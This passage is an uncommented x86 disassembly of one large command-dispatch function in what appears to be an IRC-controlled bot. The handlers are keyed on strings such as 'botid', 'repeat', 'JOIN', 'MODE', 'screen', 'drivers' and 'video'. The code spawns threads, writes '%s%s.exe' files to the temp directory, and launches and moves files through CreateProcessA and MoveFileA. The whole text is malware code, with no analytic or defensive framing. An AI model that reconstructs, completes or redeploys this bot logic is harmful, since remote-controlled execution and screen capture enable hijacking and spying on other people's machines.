push eax
push offset unk_42CB50
jmp loc_412944
; ---------------------------------------------------------------------------
loc_410A07: ; CODE XREF: sub_40D2E0+26E2�j
; sub_40D2E0+26F9�j
push 0FFh
lea eax, [ebp+var_780]
push edi
push eax
call sub_416D30
push 0FFh
lea eax, [ebp+var_680]
push [ebp+arg_18]
push eax
call sub_416D30
push [ebp+arg_0]
mov [ebp+var_57C], ebx
call sub_4159EF
mov [ebp+var_578], eax
mov eax, [ebp+esi+var_84]
add esp, 1Ch
cmp eax, ebx
jz short loc_410A63
push 10h
push ebx
push eax
call sub_416A80
add esp, 0Ch
mov [ebp+var_570], eax
jmp short loc_410A69
; ---------------------------------------------------------------------------
loc_410A63: ; CODE XREF: sub_40D2E0+376D�j
mov [ebp+var_570], ebx
loc_410A69: ; CODE XREF: sub_40D2E0+3781�j
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz short loc_410A80
push esi
call sub_4159EF
pop ecx
mov [ebp+var_574], eax
jmp short loc_410A86
; ---------------------------------------------------------------------------
loc_410A80: ; CODE XREF: sub_40D2E0+378F�j
mov [ebp+var_574], ebx
loc_410A86: ; CODE XREF: sub_40D2E0+379E�j
movzx eax, [ebp+var_9C3]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_56C], eax
lea eax, [ebp+var_800]
mov [ebp+var_804], esi
push eax
call sub_416D30
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_564], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_568], eax
lea eax, [ebp+var_2DC]
push edi
push offset unk_42CB14
push eax
call sub_415480
push esi
lea eax, [ebp+var_2DC]
push 16h
push eax
call sub_414F2C
add esp, 1Ch
mov [ebp+var_580], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_804]
push ebx
push eax
push offset sub_40B105
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_580]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_410B37
loc_410B21: ; CODE XREF: sub_40D2E0+3855�j
cmp [ebp+var_560], ebx
jnz loc_410190
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_410B21
; ---------------------------------------------------------------------------
loc_410B37: ; CODE XREF: sub_40D2E0+383F�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42CAC4
jmp loc_410D3A
; ---------------------------------------------------------------------------
loc_410B48: ; CODE XREF: sub_40D2E0+26B4�j
; sub_40D2E0+26CB�j
push 7Fh
lea eax, [ebp+var_76C]
pop esi
push esi
push edi
push eax
call sub_416D30
push esi
lea eax, [ebp+var_6EC]
push [ebp+arg_18]
push eax
call sub_416D30
push esi
lea eax, [ebp+var_66C]
push [ebp+arg_0]
push eax
call sub_416D30
push esi
lea eax, [ebp+var_5EC]
push [ebp+var_8C]
push eax
call sub_416D30
mov eax, [ebp+var_8]
add esp, 30h
mov esi, [ebp+var_4]
mov [ebp+var_564], eax
push [ebp+arg_0]
mov eax, [ebp+arg_4]
mov [ebp+var_770], eax
lea eax, [ebp+var_2DC]
push [ebp+arg_18]
mov [ebp+var_568], esi
push edi
push offset dword_42CA88
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 0Bh
push eax
call sub_414F2C
add esp, 20h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_770]
push ebx
push eax
push offset sub_4019D7
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_410C1B
loc_410C09: ; CODE XREF: sub_40D2E0+3939�j
cmp [ebp+var_560], ebx
jnz short loc_410C36
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_410C09
; ---------------------------------------------------------------------------
loc_410C1B: ; CODE XREF: sub_40D2E0+3927�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2DC]
push offset dword_42CA40
push eax
call sub_415480
add esp, 0Ch
loc_410C36: ; CODE XREF: sub_40D2E0+392F�j
cmp [ebp+var_8], ebx
jnz loc_41327F
push ebx
push esi
jmp loc_412A87
; ---------------------------------------------------------------------------
loc_410C46: ; CODE XREF: sub_40D2E0+266F�j
; sub_40D2E0+2686�j ...
push 7Fh
lea eax, [ebp+var_7E8]
pop esi
push esi
push edi
push eax
call sub_416D30
push esi
lea eax, [ebp+var_768]
push [ebp+arg_18]
push eax
call sub_416D30
push esi
lea eax, [ebp+var_6E8]
push [ebp+arg_0]
push eax
call sub_416D30
push esi
lea eax, [ebp+var_668]
push [ebp+var_8C]
push eax
call sub_416D30
push 20h
lea eax, [ebp+var_5E8]
push [ebp+arg_8]
push eax
call sub_416D30
mov eax, [ebp+var_4]
add esp, 3Ch
mov esi, [ebp+arg_4]
mov [ebp+var_568], eax
push [ebp+arg_0]
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_2DC]
push [ebp+arg_18]
mov [ebp+var_7F0], esi
push edi
push offset unk_42CA00
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 0Ah
push eax
call sub_414F2C
add esp, 20h
mov [ebp+var_7EC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_7F0]
push ebx
push eax
push offset sub_401000
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_7EC]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_410D2E
loc_410D18: ; CODE XREF: sub_40D2E0+3A4C�j
cmp [ebp+var_560], ebx
jnz loc_410190
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_410D18
; ---------------------------------------------------------------------------
loc_410D2E: ; CODE XREF: sub_40D2E0+3A36�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42C9B8
loc_410D3A: ; CODE XREF: sub_40D2E0+2E92�j
; sub_40D2E0+2FEE�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_415480
jmp loc_41018D
; ---------------------------------------------------------------------------
loc_410D4B: ; CODE XREF: sub_40D2E0+2641�j
; sub_40D2E0+2658�j
push 7Fh
lea eax, [ebp+var_458]
push edi
push eax
call sub_416D30
push [ebp+arg_18]
call sub_4159EF
push 3Fh
mov [ebp+var_308], eax
push [ebp+arg_0]
lea eax, [ebp+var_3D8]
push eax
call sub_416D30
mov esi, [ebp+esi+var_84]
add esp, 1Ch
cmp esi, ebx
jz short loc_410D99
push 3Fh
lea eax, [ebp+var_398]
push esi
push eax
call sub_416D30
add esp, 0Ch
loc_410D99: ; CODE XREF: sub_40D2E0+3AA5�j
lea eax, [ebp+var_3D8]
mov [ebp+var_304], 1
push eax
lea eax, [ebp+var_458]
push [ebp+var_308]
push eax
lea eax, [ebp+var_2DC]
push offset unk_42C978
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 18h
push eax
call sub_414F2C
add esp, 20h
mov [ebp+var_300], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_45C]
push ebx
push eax
push offset sub_40D000
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_300]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_410E25
loc_410E0F: ; CODE XREF: sub_40D2E0+3B43�j
cmp [ebp+var_2FC], ebx
jnz loc_411ED0
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_410E0F
; ---------------------------------------------------------------------------
loc_410E25: ; CODE XREF: sub_40D2E0+3B2D�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42C930
jmp loc_40FCF6
; ---------------------------------------------------------------------------
loc_410E36: ; CODE XREF: sub_40D2E0+2601�j
; sub_40D2E0+2618�j
push [ebp+arg_18]
call sub_4159EF
cmp eax, ebx
pop ecx
mov [ebp+var_570], eax
jle loc_410F2D
mov esi, 80h
push edi
lea eax, [ebp+var_6F8]
push esi
push eax
call sub_4159FA
add esp, 0Ch
xor eax, eax
cmp [ebp+var_9B6], bl
push [ebp+var_8C]
setnz al
mov [ebp+var_56C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_6FC], eax
lea eax, [ebp+var_5F8]
push esi
push eax
call sub_4159FA
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_564], eax
lea eax, [ebp+var_2DC]
push edi
push offset unk_42C8F4
push 200h
push eax
call sub_4159FA
push ebx
lea eax, [ebp+var_2DC]
push 0Dh
push eax
call sub_414F2C
add esp, 20h
mov [ebp+var_578], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6FC]
push ebx
push eax
push offset sub_40144A
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_578]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_410F1C
loc_410F06: ; CODE XREF: sub_40D2E0+3C3A�j
cmp [ebp+var_560], ebx
jnz loc_412A7A
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_410F06
; ---------------------------------------------------------------------------
loc_410F1C: ; CODE XREF: sub_40D2E0+3C24�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42C8AC
jmp loc_41206B
; ---------------------------------------------------------------------------
loc_410F2D: ; CODE XREF: sub_40D2E0+3B67�j
push offset unk_42C864
jmp loc_412A6C
; ---------------------------------------------------------------------------
loc_410F37: ; CODE XREF: sub_40D2E0+25D3�j
; sub_40D2E0+25EA�j
push [ebp+arg_18]
push edi
call ds:dword_422154 ; MoveFileA
test eax, eax
jz short loc_410F67
push [ebp+arg_18]
lea eax, [ebp+var_2DC]
push edi
push offset unk_42C830
push 200h
push eax
call sub_4159FA
add esp, 14h
jmp loc_412A7A
; ---------------------------------------------------------------------------
loc_410F67: ; CODE XREF: sub_40D2E0+3C63�j
push offset dword_42C814
call sub_40907B
pop ecx
push eax
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_4159FA
jmp loc_412077
; ---------------------------------------------------------------------------
loc_410F89: ; CODE XREF: sub_40D2E0+25A5�j
; sub_40D2E0+25BC�j
push edi
lea eax, [ebp+var_774]
push 104h
push eax
call sub_4159FA
add esp, 0Ch
cmp [ebp+var_C], ebx
jz short loc_410FC3
push [ebp+arg_18]
push [ebp+var_C]
call sub_415A50
pop ecx
cmp eax, ebx
pop ecx
jz short loc_410FC3
push eax
lea eax, [ebp+var_670]
push eax
call sub_415480
pop ecx
pop ecx
loc_410FC3: ; CODE XREF: sub_40D2E0+3CC1�j
; sub_40D2E0+3CD2�j
push [ebp+var_8C]
lea eax, [ebp+var_7F4]
push 80h
push eax
call sub_4159FA
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_7F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_670]
push eax
lea eax, [ebp+var_774]
push eax
push offset unk_42C7D4
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_4159FA
push ebx
lea eax, [ebp+var_2DC]
push 1Ch
push eax
call sub_414F2C
add esp, 20h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_7F8]
push ebx
push eax
push offset sub_407410
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_411079
loc_411063: ; CODE XREF: sub_40D2E0+3D97�j
cmp [ebp+var_560], ebx
jnz loc_41327F
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_411063
; ---------------------------------------------------------------------------
loc_411079: ; CODE XREF: sub_40D2E0+3D81�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42C788
jmp loc_413270
; ---------------------------------------------------------------------------
loc_41108A: ; CODE XREF: sub_40D2E0+2577�j
; sub_40D2E0+258E�j
push 44h
lea eax, [ebp+var_4A0]
pop esi
push esi
push ebx
push eax
call sub_415500
push 1
mov [ebp+var_4A0], esi
pop esi
mov word ptr [ebp+var_470], bx
push edi
mov [ebp+var_474], esi
call sub_4159EF
add esp, 10h
cmp eax, esi
jnz short loc_4110C7
mov word ptr [ebp+var_470], 5
loc_4110C7: ; CODE XREF: sub_40D2E0+3DDC�j
cmp [ebp+var_C], ebx
jz loc_411ED0
push [ebp+arg_18]
push [ebp+var_C]
call sub_415A50
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_411ED0
lea eax, [ebp+var_2EC]
push eax
lea eax, [ebp+var_4A0]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
call ds:dword_422104 ; CreateProcessA
test eax, eax
jnz short loc_411112
push offset unk_42C754
jmp loc_411EC2
; ---------------------------------------------------------------------------
loc_411112: ; CODE XREF: sub_40D2E0+3E26�j
push edi
push offset dword_42C72C
jmp loc_40FCF6
; ---------------------------------------------------------------------------
loc_41111D: ; CODE XREF: sub_40D2E0+2549�j
; sub_40D2E0+2560�j
push [ebp+arg_18]
push offset aBotid ; "botid"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411297
lea eax, [ebp+var_3FC]
push eax
push 104h
call ds:dword_42210C ; GetTempPathA
push 0FFh
lea eax, [ebp+var_780]
push edi
push eax
call sub_416D30
lea eax, [ebp+var_2F8]
push eax
call sub_413E62
add esp, 10h
push eax
lea eax, [ebp+var_3FC]
push eax
lea eax, [ebp+var_680]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_415480
mov eax, [ebp+esi+var_88]
add esp, 10h
cmp eax, ebx
mov [ebp+var_57C], 1
mov [ebp+var_578], ebx
jz short loc_4111B2
push 10h
push ebx
push eax
call sub_416A80
add esp, 0Ch
mov [ebp+var_570], eax
jmp short loc_4111B8
; ---------------------------------------------------------------------------
loc_4111B2: ; CODE XREF: sub_40D2E0+3EBC�j
mov [ebp+var_570], ebx
loc_4111B8: ; CODE XREF: sub_40D2E0+3ED0�j
mov esi, [ebp+esi+var_84]
cmp esi, ebx
jz short loc_4111D2
push esi
call sub_4159EF
pop ecx
mov [ebp+var_574], eax
jmp short loc_4111D8
; ---------------------------------------------------------------------------
loc_4111D2: ; CODE XREF: sub_40D2E0+3EE1�j
mov [ebp+var_574], ebx
loc_4111D8: ; CODE XREF: sub_40D2E0+3EF0�j
movzx eax, [ebp+var_9C3]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_56C], eax
lea eax, [ebp+var_800]
mov [ebp+var_804], esi
push eax
call sub_416D30
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_564], eax
mov eax, [ebp+var_8]
mov [ebp+var_568], eax
push edi
lea eax, [ebp+var_2DC]
push offset unk_42C6E4
push eax
call sub_415480
push esi
lea eax, [ebp+var_2DC]
push 17h
push eax
call sub_414F2C
add esp, 18h
mov [ebp+var_580], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_804]
push ebx
push eax
push offset sub_40B105
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_580]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_411286
loc_411270: ; CODE XREF: sub_40D2E0+3FA4�j
cmp [ebp+var_560], ebx
jnz loc_411ED0
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_411270
; ---------------------------------------------------------------------------
loc_411286: ; CODE XREF: sub_40D2E0+3F8E�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42C698
jmp loc_40FCF6
; ---------------------------------------------------------------------------
loc_411297: ; CODE XREF: sub_40D2E0+3E4E�j
push offset unk_42C644
jmp loc_411EC2
; ---------------------------------------------------------------------------
loc_4112A1: ; CODE XREF: sub_40D2E0+251B�j
; sub_40D2E0+2532�j
push [ebp+var_90]
push offset dword_42E464
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_40D6A7
cmp [ebp+var_C], ebx
jz loc_40D6A7
push [ebp+arg_18]
push [ebp+var_C]
call sub_415A50
pop ecx
pop ecx
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_8C]
push [ebp+var_90]
push [ebp+var_94]
push offset dword_42C634
push eax
call sub_415480
lea eax, [ebp+var_2DC]
push 1FFh
push eax
push [ebp+arg_0]
call sub_416D30
push edi
call sub_4159EF
add esp, 28h
test eax, eax
jle short loc_41132A
push edi
call sub_4159EF
imul eax, 3E8h
pop ecx
push eax
call ds:dword_422054 ; Sleep
loc_41132A: ; CODE XREF: sub_40D2E0+4034�j
push offset dword_42C610
call sub_40A5B3
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_40D6AA
; ---------------------------------------------------------------------------
loc_41133E: ; CODE XREF: sub_40D2E0+24ED�j
; sub_40D2E0+2504�j
push [ebp+var_90]
push offset dword_42E464
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_40D6A7
cmp [ebp+var_C], ebx
jz loc_4133B5
push [ebp+arg_18]
push [ebp+var_C]
call sub_415A50
mov esi, eax
mov eax, [ebp+arg_18]
inc eax
push offset aRepeat ; "repeat"
push eax
call sub_4158A0
add esp, 10h
test eax, eax
push esi
jz short loc_4113FD
push [ebp+var_8C]
lea eax, [ebp+var_2DC]
push [ebp+var_90]
push [ebp+var_94]
push offset dword_42C634
push eax
call sub_415480
lea eax, [ebp+var_2DC]
push 1FFh
push eax
push [ebp+arg_0]
call sub_416D30
add esp, 24h
lea eax, [ebp+var_2DC]
push esi
push offset dword_42C5E0
push eax
call sub_415480
lea eax, [ebp+var_2DC]
push eax
call sub_40A5B3
push edi
call sub_4159EF
add esp, 14h
test eax, eax
jle loc_4133B5
push edi
call sub_4159EF
add eax, [ebp+arg_24]
pop ecx
jmp loc_40D6AA
; ---------------------------------------------------------------------------
loc_4113FD: ; CODE XREF: sub_40D2E0+40A3�j
push offset dword_42C59C
jmp loc_40FCF6
; ---------------------------------------------------------------------------
loc_411407: ; CODE XREF: sub_40D2E0+24BF�j
; sub_40D2E0+24D6�j
push [ebp+arg_18]
lea eax, [ebp+var_2DC]
push offset dword_42C594
push eax
call sub_415480
push edi
call sub_4159EF
add esp, 10h
loc_411424: ; CODE XREF: sub_40D2E0+41AE�j
test eax, eax
jle loc_4133B5
push edi
call sub_4159EF
cmp eax, 400h
pop ecx
jge loc_4133B5
loc_41143E: ; CODE XREF: sub_40D2E0+4CBB�j
lea eax, [ebp+var_2DC]
push eax
push offset dword_42C58C
push edi
call sub_4159EF
imul eax, 234h
pop ecx
push ds:dword_43BECC[eax]
call sub_40BAA1
loc_411462: ; CODE XREF: sub_40D2E0+4469�j
; sub_40D2E0+5D44�j
add esp, 0Ch
jmp loc_4133B5
; ---------------------------------------------------------------------------
loc_41146A: ; CODE XREF: sub_40D2E0+2491�j
; sub_40D2E0+24A8�j
push [ebp+esi+var_88]
lea eax, [ebp+var_2DC]
push [ebp+arg_18]
push offset dword_42C580
push eax
call sub_415480
push edi
call sub_4159EF
add esp, 14h
jmp short loc_411424
; ---------------------------------------------------------------------------
loc_411490: ; CODE XREF: sub_40D2E0+2463�j
; sub_40D2E0+247A�j
push [ebp+arg_18]
lea eax, [ebp+var_2DC]
push offset dword_42C578
push eax
call sub_415480
push edi
call sub_4159EF
add esp, 10h
test eax, eax
jle loc_4133B5
push edi
call sub_4159EF
cmp eax, 400h
pop ecx
jge loc_4133B5
lea eax, [ebp+var_2DC]
push eax
push offset dword_42C58C
push edi
call sub_4159EF
imul eax, 234h
pop ecx
push ds:dword_43BECC[eax]
call sub_40BAA1
add esp, 0Ch
push [ebp+arg_18]
push edi
push offset dword_42C54C
jmp loc_411744
; ---------------------------------------------------------------------------
loc_4114FC: ; CODE XREF: sub_40D2E0+2435�j
; sub_40D2E0+244C�j
cmp [ebp+var_C], ebx
jz loc_4133B5
push [ebp+arg_18]
push [ebp+var_C]
call sub_415A50
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_41152D
push esi
lea eax, [ebp+var_2DC]
push offset dword_42C544
push eax
call sub_415480
add esp, 0Ch
loc_41152D: ; CODE XREF: sub_40D2E0+4236�j
push edi
call sub_4159EF
test eax, eax
pop ecx
jle loc_4133B5
push edi
call sub_4159EF
cmp eax, 400h
pop ecx
jge loc_4133B5
lea eax, [ebp+var_2DC]
push eax
push offset dword_42C58C
push edi
call sub_4159EF
imul eax, 234h
pop ecx
push ds:dword_43BECC[eax]
call sub_40BAA1
add esp, 0Ch
push esi
push edi
push offset dword_42C518
jmp loc_411744
; ---------------------------------------------------------------------------
loc_411581: ; CODE XREF: sub_40D2E0+2407�j
; sub_40D2E0+241E�j
cmp [ebp+var_C], ebx
jz loc_4133B5
push [ebp+arg_18]
push [ebp+var_C]
call sub_415A50
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_4133B5
push edi
call sub_4159EF
test eax, eax
pop ecx
jle loc_4133B5
push edi
call sub_4159EF
cmp eax, 400h
pop ecx
jge loc_4133B5
push esi
push offset dword_42C58C
push edi
call sub_4159EF
imul eax, 234h
pop ecx
push ds:dword_43BECC[eax]
call sub_40BAA1
add esp, 0Ch
push esi
push edi
push offset dword_42C4EC
jmp loc_411744
; ---------------------------------------------------------------------------
loc_4115EF: ; CODE XREF: sub_40D2E0+23D9�j
; sub_40D2E0+23F0�j
cmp [ebp+var_C], ebx
jz loc_4133B5
push edi
push [ebp+var_C]
call sub_415A50
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_4133B5
push esi
push offset aModeS ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_40BAA1
add esp, 0Ch
push esi
push offset dword_42C4B4
jmp loc_4133AE
; ---------------------------------------------------------------------------
loc_411629: ; CODE XREF: sub_40D2E0+23AB�j
; sub_40D2E0+23C2�j
push [ebp+var_90]
push offset dword_42E464
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_40D6A7
push [ebp+arg_18]
push offset dword_42C4A8
push [ebp+arg_4]
call sub_40BAA1
push edi
call sub_4159EF
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_422054 ; Sleep
push [ebp+esi+var_88]
push [ebp+arg_18]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40BAA1
push offset dword_42C484
call sub_40A5B3
add esp, 14h
jmp loc_4133B5
; ---------------------------------------------------------------------------
loc_411692: ; CODE XREF: sub_40D2E0+237D�j
; sub_40D2E0+2394�j
cmp [ebp+var_C], ebx
jz loc_4133B5
push edi
call sub_415C80
push [ebp+arg_8]
mov esi, eax
call sub_415C80
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_415A50
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_4133B5
push esi
lea eax, [ebp+var_2DC]
push offset dword_42CCA8
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push ebx
push eax
push edi
push [ebp+arg_4]
call sub_40BAE7
add esp, 20h
push esi
push edi
push offset dword_42C458
jmp short loc_411744
; ---------------------------------------------------------------------------
loc_4116F8: ; CODE XREF: sub_40D2E0+234F�j
; sub_40D2E0+2366�j
cmp [ebp+var_C], ebx
jz loc_4133B5
push edi
call sub_415C80
push [ebp+arg_8]
mov esi, eax
call sub_415C80
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_415A50
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_4133B5
push ebx
push ebx
push esi
push edi
push [ebp+arg_4]
call sub_40BAE7
add esp, 14h
push esi
push edi
push offset dword_42C42C
loc_411744: ; CODE XREF: sub_40D2E0+4217�j
; sub_40D2E0+429C�j ...
call sub_40A627
jmp loc_411462
; ---------------------------------------------------------------------------
loc_41174E: ; CODE XREF: sub_40D2E0+2321�j
; sub_40D2E0+2338�j
cmp [ebp+var_C], ebx
jz loc_40D6A7
push [ebp+arg_18]
push [ebp+var_C]
call sub_415A50
pop ecx
cmp eax, ebx
pop ecx
jz loc_40D6A7
push eax
push edi
call sub_40A4BB
pop ecx
pop ecx
push edi
push offset dword_42C400
jmp loc_41206B
; ---------------------------------------------------------------------------
loc_411780: ; CODE XREF: sub_40D2E0+22E1�j
; sub_40D2E0+22F8�j
push edi
push [ebp+arg_1C]
call sub_415A50
pop ecx
test eax, eax
pop ecx
jz loc_4133B5
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz loc_411824
push esi
push [ebp+var_C]
call sub_415A50
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_41180C
push esi
lea eax, [ebp+var_2DC]
push [ebp+var_8C]
push [ebp+var_90]
push [ebp+var_94]
push offset dword_42C634
push eax
call sub_415480
lea eax, [ebp+var_2DC]
push 1FFh
push eax
push [ebp+arg_0]
call sub_416D30
add esp, 24h
lea eax, [ebp+var_2DC]
push esi
push edi
push offset dword_42C3CC
push eax
call sub_415480
add esp, 10h
inc [ebp+arg_24]
jmp loc_412F31
; ---------------------------------------------------------------------------
loc_41180C: ; CODE XREF: sub_40D2E0+44D1�j
lea eax, [ebp+var_2DC]
push offset dword_42C38C
push eax
call sub_415480
pop ecx
pop ecx
jmp loc_412F31
; ---------------------------------------------------------------------------
loc_411824: ; CODE XREF: sub_40D2E0+44BC�j
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_40A1D2
add esp, 0Ch
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 14h
lea eax, [ebp+var_2DC]
push edi
push offset dword_42C364
push 200h
push eax
call sub_4159FA
add esp, 10h
jmp loc_412F31
; ---------------------------------------------------------------------------
loc_41186E: ; CODE XREF: sub_40D2E0+22B3�j
; sub_40D2E0+22CA�j
push offset aScreen ; "screen"
push edi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_4118D1
cmp [ebp+esi+var_8C], ebx
jz short loc_4118BE
push [ebp+esi+var_8C]
call sub_406BF9
cmp eax, 1
pop ecx
jnz short loc_4118B7
push [ebp+esi+var_8C]
lea eax, [ebp+var_2DC]
push offset dword_42C320
push eax
call sub_415480
add esp, 0Ch
jmp short loc_4118D1
; ---------------------------------------------------------------------------
loc_4118B7: ; CODE XREF: sub_40D2E0+45B8�j
push offset dword_42C2E4
jmp short loc_4118C3
; ---------------------------------------------------------------------------
loc_4118BE: ; CODE XREF: sub_40D2E0+45A6�j
push offset dword_42C29C
loc_4118C3: ; CODE XREF: sub_40D2E0+45DC�j
lea eax, [ebp+var_2DC]
push eax
call sub_415480
pop ecx
pop ecx
loc_4118D1: ; CODE XREF: sub_40D2E0+459D�j
; sub_40D2E0+45D5�j
push offset aDrivers ; "drivers"
push edi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_411968
mov [ebp+arg_0], ebx
loc_4118E9: ; CODE XREF: sub_40D2E0+4673�j
lea eax, [ebp+var_75C]
push 1FFh
push eax
lea eax, [ebp+var_3F8]
push 0FFh
push eax
push [ebp+arg_0]
call ds:dword_436498
test eax, eax
jz short loc_41194C
lea eax, [ebp+var_75C]
push eax
lea eax, [ebp+var_3F8]
push eax
lea eax, [ebp+var_15B0]
push [ebp+arg_0]
push offset dword_42C260
push eax
call sub_415480
push ebx
lea eax, [ebp+var_15B0]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 28h
loc_41194C: ; CODE XREF: sub_40D2E0+462C�j
inc [ebp+arg_0]
cmp [ebp+arg_0], 0Ah
jl short loc_4118E9
lea eax, [ebp+var_2DC]
push offset dword_42C22C
push eax
call sub_415480
pop ecx
pop ecx
loc_411968: ; CODE XREF: sub_40D2E0+4600�j
push offset aFrame ; "frame"
push edi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_411A0E
cmp [ebp+esi+var_8C], ebx
jz short loc_4119FB
cmp [ebp+esi+var_88], ebx
jz short loc_4119FB
cmp [ebp+esi+var_84], ebx
jz short loc_4119FB
mov eax, [ebp+esi+var_80]
cmp eax, ebx
jz short loc_4119FB
push eax
call sub_4159EF
pop ecx
push eax
push [ebp+esi+var_84]
call sub_4159EF
pop ecx
push eax
push [ebp+esi+var_88]
call sub_4159EF
pop ecx
push eax
push [ebp+esi+var_8C]
call sub_406E34
add esp, 10h
test eax, eax
jnz short loc_4119F4
push [ebp+esi+var_8C]
lea eax, [ebp+var_2DC]
push offset dword_42C1E8
push eax
call sub_415480
add esp, 0Ch
jmp short loc_411A0E
; ---------------------------------------------------------------------------
loc_4119F4: ; CODE XREF: sub_40D2E0+46F5�j
push offset dword_42C1A4
jmp short loc_411A00
; ---------------------------------------------------------------------------
loc_4119FB: ; CODE XREF: sub_40D2E0+46A4�j
; sub_40D2E0+46AD�j ...
push offset dword_42C15C
loc_411A00: ; CODE XREF: sub_40D2E0+4719�j
lea eax, [ebp+var_2DC]
push eax
call sub_415480
pop ecx
pop ecx
loc_411A0E: ; CODE XREF: sub_40D2E0+4697�j
; sub_40D2E0+4712�j
push offset aVideo ; "video"
push edi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_411ED0
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_411AA7
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+arg_0], eax
jz short loc_411AA7
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_10], eax
jz short loc_411AA7
mov edi, [ebp+esi+var_80]
